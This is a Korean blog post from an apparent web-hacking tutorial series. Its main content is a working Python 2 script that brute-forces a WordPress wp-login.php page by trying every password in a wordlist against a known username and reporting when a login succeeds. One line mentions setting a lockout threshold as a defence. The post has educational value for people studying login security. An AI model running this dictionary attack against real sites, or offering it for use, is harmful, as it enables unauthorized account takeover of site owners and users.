336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.
패스워드 크래킹은 아이디를 이미 알고 있다는 가정하에 진행하며 사전대입 공격이므로 좋은 사전 파일을 미리 구해놓는 것이 좋다.
이를 방지하기 위해서는 임계치를 설정해둬야한다.
import urllib
import urllib2
url = "http://server/wordpress/wp-login.php"
id = "python"
wordlist = open('wordlist.txt', 'r')
passwords = wordlist.readlines()
for password in passwords:
password = password.strip()
values = {'log' : id, 'pwd' : password}
data = urllib.urlencode(values)
request = urllib2.Request(url, data)
response = urllib2.urlopen(request)
try:
idx = response.geturl().index('wp-admin')
except:
idx = 0
if(idx > 0):
print "###########success###########--->"+password
break
else:
print "###########failed###########--->"+password
wordlist.close()
- 11줄 strip() : 문자열 앞뒤의 공백을 제거.
- 20줄 로그인 체크 : 정상적으로 로그인이 되었으면 관리자 화면으로 넘어가며 반환 URL에 관리자 화면 주소가 포함되어 있음.
[결과 화면]
'해킹&보안 > 웹 해킹' 카테고리의 다른 글
| [4] 웹 페이지 호출 예제 (urllib, urllib2) (0) | 2017.06.22 |
|---|---|
| [3] 쿠키정보 유지하기(urllib2) (0) | 2017.06.21 |
| [2] Request Message 보내기(urllib2) (0) | 2017.05.25 |
| [1] 웹 해킹 개요 (0) | 2017.05.23 |
